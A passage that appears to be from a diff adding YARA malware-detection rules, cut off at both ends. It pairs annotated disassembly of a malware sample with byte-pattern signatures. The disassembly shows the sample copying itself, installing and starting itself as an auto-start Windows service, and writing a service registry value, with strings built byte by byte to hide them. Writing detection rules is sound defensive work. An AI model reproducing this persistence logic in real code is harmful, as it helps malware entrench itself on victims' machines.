.text:0x00407445 50 push eax + .text:0x00407446 53 push ebx + .text:0x00407447 ff1538914000 call dword [0x00409138] ;kernel32.GetModuleFileNameA(0,local812,260) + .text:0x0040744d 53 push ebx + .text:0x0040744e ffd6 call esi ;kernel32.Sleep(0) + .text:0x00407450 c685ccfcffff25 mov byte [ebp - 820],37 + .text:0x00407457 c685cdfcffff73 mov byte [ebp - 819],115 + .text:0x0040745e 889dcefcffff mov byte [ebp - 818],bl + .text:0x00407464 53 push ebx + .text:0x00407465 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00407467 8b4d08 mov ecx,dword [ebp + 8] + .text:0x0040746a 51 push ecx + .text:0x0040746b 8d95ccfcffff lea edx,dword [ebp - 820] + .text:0x00407471 52 push edx + .text:0x00407472 8d85e0fdffff lea eax,dword [ebp - 544] + .text:0x00407478 50 push eax + .text:0x00407479 e8420a0000 call 0x00407ec0 ;msvcrt.sprintf(local548,local824) + .text:0x0040747e 83c40c add esp,12 + .text:0x00407481 53 push ebx + .text:0x00407482 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00407484 8d8de0fdffff lea ecx,dword [ebp - 544] + .text:0x0040748a 51 push ecx + .text:0x0040748b 8b0dd4aa4000 mov ecx,dword [0x0040aad4] + .text:0x00407491 e85ad2ffff call 0x004046f0 ;sub_004046f0(local548) + .text:0x00407496 50 push eax + .text:0x00407497 8d95d8fcffff lea edx,dword [ebp - 808] + .text:0x0040749d 52 push edx + .text:0x0040749e 8d85e0fdffff lea eax,dword [ebp - 544] + .text:0x004074a4 50 push eax + .text:0x004074a5 8b0dd4aa4000 mov ecx,dword [0x0040aad4] + .text:0x004074ab e8e0d0ffff call 0x00404590 ;sub_00404590(local548,local812,0,local548) + .text:0x004074b0 85c0 test eax,eax + .text:0x004074b2 746d jz 0x00407521 + .text:0x004074b4 53 push ebx + .text:0x004074b5 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004074b7 8d8de0fdffff lea ecx,dword [ebp - 544] + .text:0x004074bd 51 push ecx + .text:0x004074be e8ddf0ffff call 0x004065a0 ;sub_004065a0(local548) + .text:0x004074c3 83c404 add esp,4 + .text:0x004074c6 53 push ebx + .text:0x004074c7 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004074c9 53 push 
ebx + .text:0x004074ca 8d95e0fdffff lea edx,dword [ebp - 544] + .text:0x004074d0 52 push edx + .text:0x004074d1 8d85d8fcffff lea eax,dword [ebp - 808] + .text:0x004074d7 50 push eax + .text:0x004074d8 ff1564904000 call dword [0x00409064] ;kernel32.CopyFileA(local812,local548,0) + .text:0x004074de 53 push ebx + .text:0x004074df ffd6 call esi ;kernel32.Sleep(0) + .text:0x004074e1 8d8de0fdffff lea ecx,dword [ebp - 544] + .text:0x004074e7 51 push ecx + .text:0x004074e8 e813e3ffff call 0x00405800 ;sub_00405800(local548) + .text:0x004074ed 83c404 add esp,4 + .text:0x004074f0 53 push ebx + .text:0x004074f1 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004074f3 b941000000 mov ecx,65 + .text:0x004074f8 33c0 xor eax,eax + .text:0x004074fa 8dbdd8fcffff lea edi,dword [ebp - 808] + .text:0x00407500 f3ab rep: stosd + .text:0x00407502 53 push ebx + .text:0x00407503 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00407505 8d95e0fdffff lea edx,dword [ebp - 544] + .text:0x0040750b 52 push edx + .text:0x0040750c 8d85d8fcffff lea eax,dword [ebp - 808] + .text:0x00407512 50 push eax + .text:0x00407513 8b0dd4aa4000 mov ecx,dword [0x0040aad4] + .text:0x00407519 e852d2ffff call 0x00404770 ;sub_00404770(local812,local548) + .text:0x0040751e 53 push ebx + .text:0x0040751f ffd6 call esi ;kernel32.Sleep(0) + .text:0x00407521 loc_00407521: [1 XREFS] + .text:0x00407521 803d60a5400001 cmp byte [0x0040a560],1 + .text:0x00407528 0f84f5020000 jz 0x00407823 + .text:0x0040752e 53 push ebx + .text:0x0040752f ffd6 call esi ;kernel32.Sleep(0) + .text:0x00407531 6888130000 push 0x00001388 + .text:0x00407536 ffd6 call esi ;kernel32.Sleep(0x00001388) + .text:0x00407538 899ddcfdffff mov dword [ebp - 548],ebx + .text:0x0040753e 33ff xor edi,edi + .text:0x00407540 89bdd0fcffff mov dword [ebp - 816],edi + .text:0x00407546 899dd4fcffff mov dword [ebp - 812],ebx + .text:0x0040754c 895dfc mov dword [ebp - 4],ebx + .text:0x0040754f 53 push ebx + .text:0x00407550 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00407552 
683f000f00 push 0x000f003f + .text:0x00407557 53 push ebx + .text:0x00407558 53 push ebx + .text:0x00407559 ff1544904000 call dword [0x00409044] ;advapi32.OpenSCManagerA(0,0,0x000f003f) + .text:0x0040755f 8bd8 mov ebx,eax + .text:0x00407561 899dd4fcffff mov dword [ebp - 812],ebx + .text:0x00407567 57 push edi + .text:0x00407568 ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040756a 85db test ebx,ebx + .text:0x0040756c 0f84a5020000 jz 0x00407817 + .text:0x00407572 57 push edi + .text:0x00407573 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00407575 57 push edi + .text:0x00407576 57 push edi + .text:0x00407577 57 push edi + .text:0x00407578 57 push edi + .text:0x00407579 57 push edi + .text:0x0040757a 8d8dd8fcffff lea ecx,dword [ebp - 808] + .text:0x00407580 51 push ecx + .text:0x00407581 57 push edi + .text:0x00407582 6a02 push 2 + .text:0x00407584 6810010000 push 272 + .text:0x00407589 68ff010f00 push 0x000f01ff + .text:0x0040758e 8b5510 mov edx,dword [ebp + 16] + .text:0x00407591 52 push edx + .text:0x00407592 8b450c mov eax,dword [ebp + 12] + .text:0x00407595 50 push eax + .text:0x00407596 53 push ebx + .text:0x00407597 ff1540904000 call dword [0x00409040] ;advapi32.CreateServiceA(advapi32.OpenSCManagerA(0,0,0x000f003f),arg1,arg2,0x000f01ff,272,2,0,local812,0,0,0,0,0) + .text:0x0040759d 8bf8 mov edi,eax + .text:0x0040759f 89bdd0fcffff mov dword [ebp - 816],edi + .text:0x004075a5 6a00 push 0 + .text:0x004075a7 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004075a9 53 push ebx + .text:0x004075aa ff153c904000 call dword [0x0040903c] ;advapi32.LockServiceDatabase(<0x00407559>) + .text:0x004075b0 8985a0fcffff mov dword [ebp - 864],eax + .text:0x004075b6 6a00 push 0 + .text:0x004075b8 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004075ba c785c8fcffff7ca2 mov dword [ebp - 824],0x0040a27c + .text:0x004075c4 6a00 push 0 + .text:0x004075c6 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004075c8 8d8dc8fcffff lea ecx,dword [ebp - 824] + .text:0x004075ce 51 push ecx + .text:0x004075cf 6a01 
push 1 + .text:0x004075d1 57 push edi + .text:0x004075d2 ff1538904000 call dword [0x00409038] ;advapi32.ChangeServiceConfig2A(advapi32.CreateServiceA(<0x00407559>,arg1,arg2,0x000f01ff,272,2,0,local812,0,0,0,0,0),1,local828) + .text:0x004075d8 6a00 push 0 + .text:0x004075da ffd6 call esi ;kernel32.Sleep(0) + .text:0x004075dc 8b95a0fcffff mov edx,dword [ebp - 864] + .text:0x004075e2 52 push edx + .text:0x004075e3 ff1534904000 call dword [0x00409034] ;advapi32.UnlockServiceDatabase(advapi32.LockServiceDatabase(<0x00407559>)) + .text:0x004075e9 6a00 push 0 + .text:0x004075eb ffd6 call esi ;kernel32.Sleep(0) + .text:0x004075ed 85ff test edi,edi + .text:0x004075ef 7542 jnz 0x00407633 + .text:0x004075f1 57 push edi + .text:0x004075f2 ffd6 call esi ;kernel32.Sleep(<0x00407597>) + .text:0x004075f4 ff15d4904000 call dword [0x004090d4] ;ntdll.RtlGetLastWin32Error() + .text:0x004075fa 3d31040000 cmp eax,1073 + .text:0x004075ff 7532 jnz 0x00407633 + .text:0x00407601 57 push edi + .text:0x00407602 ffd6 call esi ;kernel32.Sleep(<0x00407597>) + .text:0x00407604 68ff010f00 push 0x000f01ff + .text:0x00407609 8b450c mov eax,dword [ebp + 12] + .text:0x0040760c 50 push eax + .text:0x0040760d 53 push ebx + .text:0x0040760e ff1530904000 call dword [0x00409030] ;advapi32.OpenServiceA(<0x00407559>,arg1,0x000f01ff) + .text:0x00407614 8bf8 mov edi,eax + .text:0x00407616 89bdd0fcffff mov dword [ebp - 816],edi + .text:0x0040761c 6a00 push 0 + .text:0x0040761e ffd6 call esi ;kernel32.Sleep(0) + .text:0x00407620 85ff test edi,edi + .text:0x00407622 0f84ef010000 jz 0x00407817 + .text:0x00407628 6a00 push 0 + .text:0x0040762a 6a00 push 0 + .text:0x0040762c 57 push edi + .text:0x0040762d ff152c904000 call dword [0x0040902c] ;advapi32.StartServiceA(advapi32.OpenServiceA(<0x00407559>,arg1,0x000f01ff),0,0) + .text:0x00407633 loc_00407633: [2 XREFS] + .text:0x00407633 6a00 push 0 + .text:0x00407635 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00407637 6a00 push 0 + .text:0x00407639 6a00 push 0 + 
.text:0x0040763b 57 push edi + .text:0x0040763c ff152c904000 call dword [0x0040902c] ;advapi32.StartServiceA(<0x00407597>,0,0) + .text:0x00407642 85c0 test eax,eax + .text:0x00407644 0f84cd010000 jz 0x00407817 + .text:0x0040764a 6a00 push 0 + .text:0x0040764c ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040764e b053 mov al,83 + .text:0x00407650 8885a4fcffff mov byte [ebp - 860],al + .text:0x00407656 c685a5fcffff59 mov byte [ebp - 859],89 + .text:0x0040765d 8885a6fcffff mov byte [ebp - 858],al + .text:0x00407663 c685a7fcffff54 mov byte [ebp - 857],84 + .text:0x0040766a c685a8fcffff45 mov byte [ebp - 856],69 + .text:0x00407671 c685a9fcffff4d mov byte [ebp - 855],77 + .text:0x00407678 b15c mov cl,92 + .text:0x0040767a 888daafcffff mov byte [ebp - 854],cl + .text:0x00407680 b243 mov dl,67 + .text:0x00407682 8895abfcffff mov byte [ebp - 853],dl + .text:0x00407688 c685acfcffff75 mov byte [ebp - 852],117 + .text:0x0040768f c685adfcffff72 mov byte [ebp - 851],114 + .text:0x00407696 c685aefcffff72 mov byte [ebp - 850],114 + .text:0x0040769d b365 mov bl,101 + .text:0x0040769f 889daffcffff mov byte [ebp - 849],bl + .text:0x004076a5 c685b0fcffff6e mov byte [ebp - 848],110 + .text:0x004076ac c685b1fcffff74 mov byte [ebp - 847],116 + .text:0x004076b3 8895b2fcffff mov byte [ebp - 846],dl + .text:0x004076b9 c685b3fcffff6f mov byte [ebp - 845],111 + .text:0x004076c0 c685b4fcffff6e mov byte [ebp - 844],110 + .text:0x004076c7 c685b5fcffff74 mov byte [ebp - 843],116 + .text:0x004076ce c685b6fcffff72 mov byte [ebp - 842],114 + .text:0x004076d5 c685b7fcffff6f mov byte [ebp - 841],111 + .text:0x004076dc c685b8fcffff6c mov byte [ebp - 840],108 + .text:0x004076e3 8885b9fcffff mov byte [ebp - 839],al + .text:0x004076e9 889dbafcffff mov byte [ebp - 838],bl + .text:0x004076ef c685bbfcffff74 mov byte [ebp - 837],116 + .text:0x004076f6 888dbcfcffff mov byte [ebp - 836],cl + .text:0x004076fc 8885bdfcffff mov byte [ebp - 835],al + .text:0x00407702 889dbefcffff mov byte [ebp - 834],bl + 
.text:0x00407708 c685bffcffff72 mov byte [ebp - 833],114 + .text:0x0040770f c685c0fcffff76 mov byte [ebp - 832],118 + .text:0x00407716 c685c1fcffff69 mov byte [ebp - 831],105 + .text:0x0040771d c685c2fcffff63 mov byte [ebp - 830],99 + .text:0x00407724 889dc3fcffff mov byte [ebp - 829],bl + .text:0x0040772a c685c4fcffff73 mov byte [ebp - 828],115 + .text:0x00407731 888dc5fcffff mov byte [ebp - 827],cl + .text:0x00407737 c685c6fcffff00 mov byte [ebp - 826],0 + .text:0x0040773e 6a00 push 0 + .text:0x00407740 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00407742 8d8da4fcffff lea ecx,dword [ebp - 860] + .text:0x00407748 51 push ecx + .text:0x00407749 8d95e4feffff lea edx,dword [ebp - 284] + .text:0x0040774f 52 push edx + .text:0x00407750 8b0dd4aa4000 mov ecx,dword [0x0040aad4] + .text:0x00407756 e815d0ffff call 0x00404770 ;sub_00404770(local288,local864) + .text:0x0040775b 6a00 push 0 + .text:0x0040775d ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040775f 8b450c mov eax,dword [ebp + 12] + .text:0x00407762 50 push eax + .text:0x00407763 8d8de4feffff lea ecx,dword [ebp - 284] + .text:0x00407769 51 push ecx + .text:0x0040776a 8b0dd4aa4000 mov ecx,dword [0x0040aad4] + .text:0x00407770 e83bcfffff call 0x004046b0 ;sub_004046b0(local288,arg1) + .text:0x00407775 6a00 push 0 + .text:0x00407777 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00407779 8d95dcfdffff lea edx,dword [ebp - 548] + .text:0x0040777f 52 push edx + .text:0x00407780 8d85e4feffff lea eax,dword [ebp - 284] + .text:0x00407786 50 push eax + .text:0x00407787 6802000080 push 0x80000002 + .text:0x0040778c ff1520904000 call dword [0x00409020] ;advapi32.RegOpenKeyA(0x80000002,local288,local552) + .text:0x00407792 6a00 push 0 + .text:0x00407794 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00407796 c68594fcffff44 mov byte [ebp - 876],68 + .text:0x0040779d 889d95fcffff mov byte [ebp - 875],bl + .text:0x004077a3 c68596fcffff73 mov byte [ebp - 874],115 + .text:0x004077aa c68597fcffff63 mov byte [ebp - 873],99 + .text:0x004077b1 
c68598fcffff72 mov byte [ebp - 872],114 + .text:0x004077b8 c68599fcffff69 mov byte [ebp - 871],105 + .text:0x004077bf c6859afcffff70 mov byte [ebp - 870],112 + .text:0x004077c6 c6859bfcffff74 mov byte [ebp - 869],116 + .text:0x004077cd c6859cfcffff69 mov byte [ebp - 868],105 + .text:0x004077d4 c6859dfcffff6f mov byte [ebp - 867],111 + .text:0x004077db c6859efcffff6e mov byte [ebp - 866],110 + .text:0x004077e2 c6859ffcffff00 mov byte [ebp - 865],0 + .text:0x004077e9 6a00 push 0 + .text:0x004077eb ffd6 call esi ;kernel32.Sleep(0) + .text:0x004077ed 8b5d14 mov ebx,dword [ebp + 20] + .text:0x004077f0 53 push ebx + .text:0x004077f1 ff15c4904000 call dword [0x004090c4] ;kernel32.lstrlenA(arg3) + .text:0x004077f7 50 push eax + .text:0x004077f8 53 push ebx + .text:0x004077f9 6a01 push 1 + .text:0x004077fb 6a00 push 0 + .text:0x004077fd 8d8d94fcffff lea ecx,dword [ebp - 876] + .text:0x00407803 51 push ecx + .text:0x00407804 8b95dcfdffff mov edx,dword [ebp - 548] + .text:0x0040780a 52 push edx + .text:0x0040780b ff1500904000 call dword [0x00409000] ;advapi32.RegSetValueExA(0,local880,0,1,arg3,kernel32.lstrlenA(arg3)) + .text:0x00407811 8b9dd4fcffff mov ebx,dword [ebp - 812] + .text:0x00407817 loc_00407817: [3 XREFS] + .text:0x00407817 c745fcffffffff mov dword [ebp - 4],0xffffffff + .text:0x0040781e e823000000 call 0x00407846 ;sub_00407846() + .text:0x00407823 loc_00407823: [1 XREFS] + .text:0x00407823 8b4df0 mov ecx,dword [ebp - 16] + .text:0x00407826 64890d00000000 fs: mov dword [0x00000000],ecx + .text:0x0040782d 5f pop edi + .text:0x0040782e 5e pop esi + .text:0x0040782f 5b pop ebx + .text:0x00407830 8be5 mov esp,ebp + .text:0x00407832 5d pop ebp + .text:0x00407833 c3 ret + */ + $c33 = { 55 8B EC 6A FF 68 B8 92 40 00 68 90 7E 40 00 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 81 EC 5C 03 00 00 53 56 57 C6 85 ?? ?? ?? ?? 00 B9 40 00 00 00 33 C0 8D BD ?? ?? ?? ?? F3 AB 66 AB AA 33 DB 53 8B 35 ?? ?? ?? ?? FF D6 68 04 01 00 00 8D 85 ?? ?? ?? ?? 50 53 FF 15 ?? ?? ?? ?? 
53 FF D6 C6 85 ?? ?? ?? ?? 25 C6 85 ?? ?? ?? ?? 73 88 9D ?? ?? ?? ?? 53 FF D6 8B 4D ?? 51 8D 95 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 0C 53 FF D6 8D 8D ?? ?? ?? ?? 51 8B 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8D 95 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 8B 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 53 FF D6 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 04 53 FF D6 53 8D 95 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 53 FF D6 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 04 53 FF D6 B9 41 00 00 00 33 C0 8D BD ?? ?? ?? ?? F3 AB 53 FF D6 8D 95 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 8B 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 FF D6 80 3D ?? ?? ?? ?? 01 0F 84 ?? ?? ?? ?? 53 FF D6 68 88 13 00 00 FF D6 89 9D ?? ?? ?? ?? 33 FF 89 BD ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 5D ?? 53 FF D6 68 3F 00 0F 00 53 53 FF 15 ?? ?? ?? ?? 8B D8 89 9D ?? ?? ?? ?? 57 FF D6 85 DB 0F 84 ?? ?? ?? ?? 57 FF D6 57 57 57 57 57 8D 8D ?? ?? ?? ?? 51 57 6A 02 68 10 01 00 00 68 FF 01 0F 00 8B 55 ?? 52 8B 45 ?? 50 53 FF 15 ?? ?? ?? ?? 8B F8 89 BD ?? ?? ?? ?? 6A 00 FF D6 53 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 6A 00 FF D6 C7 85 ?? ?? ?? ?? 7C A2 40 00 6A 00 FF D6 8D 8D ?? ?? ?? ?? 51 6A 01 57 FF 15 ?? ?? ?? ?? 6A 00 FF D6 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 6A 00 FF D6 85 FF 75 ?? 57 FF D6 FF 15 ?? ?? ?? ?? 3D 31 04 00 00 75 ?? 57 FF D6 68 FF 01 0F 00 8B 45 ?? 50 53 FF 15 ?? ?? ?? ?? 8B F8 89 BD ?? ?? ?? ?? 6A 00 FF D6 85 FF 0F 84 ?? ?? ?? ?? 6A 00 6A 00 57 FF 15 ?? ?? ?? ?? 6A 00 FF D6 6A 00 6A 00 57 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 6A 00 FF D6 B0 53 88 85 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? 59 88 85 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? 54 C6 85 ?? ?? ?? ?? 45 C6 85 ?? ?? ?? ?? 4D B1 5C 88 8D ?? ?? ?? ?? B2 43 88 95 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? 75 C6 85 ?? ?? ?? ?? 72 C6 85 ?? ?? ?? ?? 72 B3 65 88 9D ?? ?? ?? ?? C6 85 ?? ?? ?? ?? 6E C6 85 ?? ?? ?? ?? 74 88 95 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? 6F C6 85 ?? ?? ?? ?? 6E C6 85 ?? ?? ?? ?? 74 C6 85 ?? ?? ?? ?? 72 C6 85 ?? ?? ?? ?? 6F C6 85 ?? ?? ?? ?? 6C 88 85 ?? ?? 
?? ?? 88 9D ?? ?? ?? ?? C6 85 ?? ?? ?? ?? 74 88 8D ?? ?? ?? ?? 88 85 ?? ?? ?? ?? 88 9D ?? ?? ?? ?? C6 85 ?? ?? ?? ?? 72 C6 85 ?? ?? ?? ?? 76 C6 85 ?? ?? ?? ?? 69 C6 85 ?? ?? ?? ?? 63 88 9D ?? ?? ?? ?? C6 85 ?? ?? ?? ?? 73 88 8D ?? ?? ?? ?? C6 85 ?? ?? ?? ?? 00 6A 00 FF D6 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 52 8B 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A 00 FF D6 8B 45 ?? 50 8D 8D ?? ?? ?? ?? 51 8B 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A 00 FF D6 8D 95 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 68 02 00 00 80 FF 15 ?? ?? ?? ?? 6A 00 FF D6 C6 85 ?? ?? ?? ?? 44 88 9D ?? ?? ?? ?? C6 85 ?? ?? ?? ?? 73 C6 85 ?? ?? ?? ?? 63 C6 85 ?? ?? ?? ?? 72 C6 85 ?? ?? ?? ?? 69 C6 85 ?? ?? ?? ?? 70 C6 85 ?? ?? ?? ?? 74 C6 85 ?? ?? ?? ?? 69 C6 85 ?? ?? ?? ?? 6F C6 85 ?? ?? ?? ?? 6E C6 85 ?? ?? ?? ?? 00 6A 00 FF D6 8B 5D ?? 53 FF 15 ?? ?? ?? ?? 50 53 6A 01 6A 00 8D 8D ?? ?? ?? ?? 51 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? C7 45 ?? FF FF FF FF E8 ?? ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C3 } + /* +function at 0x004065a0@9324d1a8ae37a36ae560c37448c9705a with 1 features: + - create directory + .text:0x004065a0 + .text:0x004065a0 FUNC: int cdecl sub_004065a0( int arg0, ) [2 XREFS] + .text:0x004065a0 + .text:0x004065a0 Stack Variables: (offset from initial top of stack) + .text:0x004065a0 4: int arg0 + .text:0x004065a0 -259: int local259 + .text:0x004065a0 -260: int local260 + .text:0x004065a0 -272: int local272 + .text:0x004065a0 + .text:0x004065a0 81ec04010000 sub esp,260 + .text:0x004065a6 53 push ebx + .text:0x004065a7 56 push esi + .text:0x004065a8 57 push edi + .text:0x004065a9 b940000000 mov ecx,64 + .text:0x004065ae 33c0 xor eax,eax + .text:0x004065b0 8d7c240d lea edi,dword [esp + 13] + .text:0x004065b4 c644240c00 mov byte [esp + 12],0 + .text:0x004065b9 8b3578904000 mov esi,dword [0x00409078] + .text:0x004065bf f3ab rep: stosd + .text:0x004065c1 66ab stosd + .text:0x004065c3 6a00 push 0 + .text:0x004065c5 aa stosb + .text:0x004065c6 ffd6 call esi ;kernel32.Sleep(0) 
+ .text:0x004065c8 6a00 push 0 + .text:0x004065ca ffd6 call esi ;kernel32.Sleep(0) + .text:0x004065cc 8b9c2414010000 mov ebx,dword [esp + 276] + .text:0x004065d3 8b0dd4aa4000 mov ecx,dword [0x0040aad4] + .text:0x004065d9 53 push ebx + .text:0x004065da 33ff xor edi,edi + .text:0x004065dc e80fe1ffff call 0x004046f0 ;sub_004046f0(arg0) + .text:0x004065e1 85c0 test eax,eax + .text:0x004065e3 765e jbe 0x00406643 + .text:0x004065e5 55 push ebp + .text:0x004065e6 8b2d24914000 mov ebp,dword [0x00409124] + .text:0x004065ec loc_004065ec: [1 XREFS] + .text:0x004065ec 803c1f5c cmp byte [edi + ebx],92 + .text:0x004065f0 753f jnz 0x00406631 + .text:0x004065f2 6a00 push 0 + .text:0x004065f4 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004065f6 8b0dd4aa4000 mov ecx,dword [0x0040aad4] + .text:0x004065fc 57 push edi + .text:0x004065fd 8d442414 lea eax,dword [esp + 20] + .text:0x00406601 53 push ebx + .text:0x00406602 50 push eax + .text:0x00406603 e858e0ffff call 0x00404660 ;sub_00404660(local260,edx,0,local260) + .text:0x00406608 6a00 push 0 + .text:0x0040660a ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040660c 8d4c2410 lea ecx,dword [esp + 16] + .text:0x00406610 6a00 push 0 + .text:0x00406612 51 push ecx + .text:0x00406613 e8ae180000 call 0x00407ec6 ;msvcrt._access(local272,0) + .text:0x00406618 83c408 add esp,8 + .text:0x0040661b 83f8ff cmp eax,0xffffffff + .text:0x0040661e 7511 jnz 0x00406631 + .text:0x00406620 6a00 push 0 + .text:0x00406622 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00406624 8d542410 lea edx,dword [esp + 16] + .text:0x00406628 6a00 push 0 + .text:0x0040662a 52 push edx + .text:0x0040662b ffd5 call ebp ;kernel32.CreateDirectoryA(local272,0) + .text:0x0040662d 6a00 push 0 + .text:0x0040662f ffd6 call esi ;kernel32.Sleep(0) + .text:0x00406631 loc_00406631: [2 XREFS] + .text:0x00406631 8b0dd4aa4000 mov ecx,dword [0x0040aad4] + .text:0x00406637 53 push ebx + .text:0x00406638 47 inc edi + .text:0x00406639 e8b2e0ffff call 0x004046f0 ;sub_004046f0(arg0) + 
.text:0x0040663e 3bf8 cmp edi,eax + .text:0x00406640 72aa jc 0x004065ec + .text:0x00406642 5d pop ebp + .text:0x00406643 loc_00406643: [1 XREFS] + .text:0x00406643 5f pop edi + .text:0x00406644 5e pop esi + .text:0x00406645 5b pop ebx + .text:0x00406646 81c404010000 add esp,260 + .text:0x0040664c c3 ret + */ + $c34 = { 81 EC 04 01 00 00 53 56 57 B9 40 00 00 00 33 C0 8D 7C 24 ?? C6 44 24 ?? 00 8B 35 ?? ?? ?? ?? F3 AB 66 AB 6A 00 AA FF D6 6A 00 FF D6 8B 9C 24 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 53 33 FF E8 ?? ?? ?? ?? 85 C0 76 ?? 55 8B 2D ?? ?? ?? ?? 80 3C 1F 5C 75 ?? 6A 00 FF D6 8B 0D ?? ?? ?? ?? 57 8D 44 24 ?? 53 50 E8 ?? ?? ?? ?? 6A 00 FF D6 8D 4C 24 ?? 6A 00 51 E8 ?? ?? ?? ?? 83 C4 08 83 F8 FF 75 ?? 6A 00 FF D6 8D 54 24 ?? 6A 00 52 FF D5 6A 00 FF D6 8B 0D ?? ?? ?? ?? 53 47 E8 ?? ?? ?? ?? 3B F8 72 ?? 5D 5F 5E 5B 81 C4 04 01 00 00 C3 } + /* +function at 0x004029f0@9324d1a8ae37a36ae560c37448c9705a with 3 features: + - check if file exists + - get file size + - read file on Windows + .text:0x004029f0 + .text:0x004029f0 FUNC: int cdecl sub_004029f0( int arg0, int arg1, int arg2, int arg3, ) [4 XREFS] + .text:0x004029f0 + .text:0x004029f0 Stack Variables: (offset from initial top of stack) + .text:0x004029f0 16: int arg3 + .text:0x004029f0 12: int arg2 + .text:0x004029f0 8: int arg1 + .text:0x004029f0 4: int arg0 + .text:0x004029f0 -51: int local51 + .text:0x004029f0 -52: int local52 + .text:0x004029f0 -56: int local56 + .text:0x004029f0 -57: int local57 + .text:0x004029f0 -58: int local58 + .text:0x004029f0 -59: int local59 + .text:0x004029f0 -60: int local60 + .text:0x004029f0 -61: int local61 + .text:0x004029f0 -62: int local62 + .text:0x004029f0 -63: int local63 + .text:0x004029f0 -64: int local64 + .text:0x004029f0 -65: int local65 + .text:0x004029f0 -66: int local66 + .text:0x004029f0 -67: int local67 + .text:0x004029f0 -68: int local68 + .text:0x004029f0 -70: int local70 + .text:0x004029f0 -71: int local71 + .text:0x004029f0 -72: int local72 + .text:0x004029f0 -73: 
int local73 + .text:0x004029f0 -74: int local74 + .text:0x004029f0 -75: int local75 + .text:0x004029f0 -76: int local76 + .text:0x004029f0 -80: int local80 + .text:0x004029f0 -84: int local84 + .text:0x004029f0 -88: int local88 + .text:0x004029f0 + .text:0x004029f0 83ec58 sub esp,88 + .text:0x004029f3 8b1530ac4000 mov edx,dword [0x0040ac30] + .text:0x004029f9 b031 mov al,49 + .text:0x004029fb 8844241a mov byte [esp + 26],al + .text:0x004029ff 8844241f mov byte [esp + 31],al + .text:0x00402a03 a020ac4000 mov al,byte [0x0040ac20] + .text:0x00402a08 b156 mov cl,86 + .text:0x00402a0a 88442408 mov byte [esp + 8],al + .text:0x00402a0e 8b049524ac4000 mov eax,dword [0x0040ac24 + edx * 4] + .text:0x00402a15 53 push ebx + .text:0x00402a16 89442404 mov dword [esp + 4],eax + .text:0x00402a1a a1bca94000 mov eax,dword [0x0040a9bc] + .text:0x00402a1f 55 push ebp + .text:0x00402a20 884c241c mov byte [esp + 28],cl + .text:0x00402a24 884c2426 mov byte [esp + 38],cl + .text:0x00402a28 8a0d10ac4000 mov cl,byte [0x0040ac10] + .text:0x00402a2e 33ed xor ebp,ebp + .text:0x00402a30 b353 mov bl,83 + .text:0x00402a32 56 push esi + .text:0x00402a33 8b3578904000 mov esi,dword [0x00409078] + .text:0x00402a39 c644242149 mov byte [esp + 33],73 + .text:0x00402a3e 85c0 test eax,eax + .text:0x00402a40 c644242244 mov byte [esp + 34],68 + .text:0x00402a45 c64424233a mov byte [esp + 35],58 + .text:0x00402a4a c644242432 mov byte [esp + 36],50 + .text:0x00402a4f c644242530 mov byte [esp + 37],48 + .text:0x00402a54 c644242733 mov byte [esp + 39],51 + .text:0x00402a59 c64424282d mov byte [esp + 40],45 + .text:0x00402a5e 885c2429 mov byte [esp + 41],bl + .text:0x00402a62 c644242c00 mov byte [esp + 44],0 + .text:0x00402a67 884c2410 mov byte [esp + 16],cl + .text:0x00402a6b 0f8570010000 jnz 0x00402be1 + .text:0x00402a71 8b4c246c mov ecx,dword [esp + 108] + .text:0x00402a75 51 push ecx + .text:0x00402a76 e8d5feffff call 0x00402950 ;sub_00402950(0,0,arg1,arg1) + .text:0x00402a7b 83c404 add esp,4 + 
